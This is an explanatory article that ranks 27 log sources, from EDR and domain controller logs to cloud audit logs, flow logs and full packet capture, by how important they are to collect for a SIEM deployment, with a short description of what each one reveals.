Essential Log Types for Effective SIEM Deployment

In the realm of cybersecurity, the ability to monitor, detect, and respond to incidents is critical. Security Information and Event Management (SIEM) systems are central to this effort, offering real-time analysis of security alerts generated by applications and network hardware.

For a SIEM to be effective, it requires a comprehensive and prioritized collection of event logs. The following list, though subject to customization per organizational needs, outlines the essential logs to collect, starting with those of highest priority.

1. Security Product Logs (EDR/AV/HIPS/IPS)

Endpoint Detection and Response (EDR), Antivirus (AV), Host-based Intrusion Prevention Systems (HIPS), and Intrusion Prevention Systems (IPS) logs are vital as they provide insights into malware activity, potential intrusions, and endpoint behaviors. These logs are often the first line of defense, offering detailed information on security events.

2. Windows DC Event Logs / LDAP Logs

Windows Domain Controller (DC) Event Logs and LDAP Logs are critical for monitoring authentication activities, user permissions, and potential security breaches within a Windows environment. They help in tracking login attempts, user access patterns, and changes to directory services.

3. Web Proxy Requests

Logs from Web Proxy Servers capture web traffic details, allowing organizations to monitor and control web access. These logs are useful for identifying suspicious web activity, blocking malicious sites, and ensuring compliance with browsing policies.

4. PowerShell Logs

PowerShell Logs are essential for monitoring script executions and identifying potentially malicious activities. PowerShell is a powerful tool often used by attackers for lateral movement and data exfiltration; thus, logging its usage helps in early threat detection.

5. DNS Queries (with endpoint name/IP)

DNS Query Logs provide visibility into domain name resolution activities. Logging DNS queries, along with endpoint names and IP addresses, helps in identifying command-and-control communication, phishing attempts, and other DNS-based threats.

6. Firewall (Egress Only)

Firewall Logs, specifically for egress traffic, are crucial for monitoring outbound connections from the network. They help in detecting unauthorized data exfiltration, identifying compromised systems, and ensuring policy compliance.

7. VPN Logs

VPN Logs are important for tracking remote access to the network. They provide information on user connections, session durations, and potential anomalies, which are crucial for identifying unauthorized access and securing remote work environments.

8. Google Cloud Logging

Google Cloud Logging captures events within Google Cloud environments, including access logs, system events, and application logs. These logs are vital for maintaining security and compliance in cloud deployments.

9. AWS CloudWatch

AWS CloudWatch logs provide comprehensive monitoring of AWS resources and applications. They include performance metrics, resource utilization, and security events, aiding in the detection of potential threats and anomalies in AWS environments.

10. Microsoft M365 UnifiedAuditLog

The Microsoft M365 UnifiedAuditLog consolidates logs from various Microsoft 365 services, providing a unified view of user activities, administrative actions, and security events. This is essential for monitoring and securing the Microsoft 365 environment.

11. Microsoft AzureAD Sign-In Logs

AzureAD Sign-In Logs capture user authentication attempts to Azure services. These logs are critical for detecting suspicious login activities, brute force attacks, and unauthorized access to Azure resources.

12. Microsoft Cloud App Security Logs

Microsoft Cloud App Security Logs offer insights into cloud application activities, including user behaviors, threat detections, and policy violations. These logs help in securing cloud applications and enforcing security policies.

13. Microsoft AzureAD Identity Protection

AzureAD Identity Protection logs provide information on risk detections and automated responses to identity-based threats. These logs are crucial for identifying and mitigating identity-related security risks.

14. Microsoft M365 Defender for Identity

Microsoft M365 Defender for Identity (formerly Azure ATP) logs monitor and detect advanced threats, compromised identities, and malicious insider actions. These logs are important for protecting the organization’s identity infrastructure.

15. Linux osquery Logs

Linux osquery Logs collect detailed information about Linux systems, including process activities, file integrity changes, and network connections. They are useful for monitoring and securing Linux environments.

16. Windows Member Server Event Logs

Windows Member Server Event Logs capture security events, system activities, and application logs on Windows servers. These logs help in monitoring server performance and identifying potential security incidents.

17. Windows Workstation Event Logs

Windows Workstation Event Logs provide insights into user activities, system events, and application usage on Windows workstations. They are essential for detecting and responding to security incidents on user devices.

18. Linux auditd Logs

Linux auditd Logs capture detailed auditing information on Linux systems, including user actions, system calls, and security events. These logs are important for maintaining security and compliance in Linux environments.

19. Email Logs

Email Logs capture information about email traffic, including sent and received messages, attachments, and spam detections. These logs are vital for detecting phishing attacks, spam, and email-based threats.

20. Custom Application Logs

Custom Application Logs collect event data from bespoke applications. These logs are necessary for monitoring application performance, detecting anomalies, and ensuring application security.

21. Firewall (General)

General Firewall Logs capture both ingress and egress traffic, providing a comprehensive view of network activities. These logs help in monitoring for unauthorized access, policy violations, and potential threats.

22. DHCP Logs

DHCP Logs track the assignment of IP addresses within the network. These logs are useful for identifying devices, tracking network changes, and detecting rogue devices.

23. Netflow

Netflow Logs provide detailed information about network traffic flows, including source and destination addresses, protocols, and volume of data transferred. These logs are important for network monitoring and detecting anomalies.

24. AWS VPC Flow Logs

AWS VPC Flow Logs capture information about the IP traffic going to and from network interfaces in an Amazon VPC. These logs are critical for monitoring network traffic, identifying security threats, and ensuring compliance in AWS environments.

25. Google VPC Flow Logs

Google VPC Flow Logs provide visibility into network traffic within Google Cloud environments. They help in monitoring traffic patterns, detecting unauthorized access, and securing cloud resources.

26. Microsoft Network Security Group Flow Logs

Microsoft Network Security Group (NSG) Flow Logs capture information about network traffic to and from Azure resources. These logs are essential for monitoring and securing Azure network traffic.

27. Full Packet Capture

Full Packet Capture logs record all network traffic, providing the most granular level of network monitoring. These logs are invaluable for detailed forensic analysis, investigating security incidents, and understanding network behaviors.

In conclusion, the prioritized collection of these event logs into your SIEM is crucial for maintaining a robust security posture. By continuously monitoring these logs, organizations can detect and respond to threats more effectively, ensuring the security and integrity of their IT environments.

You may also like: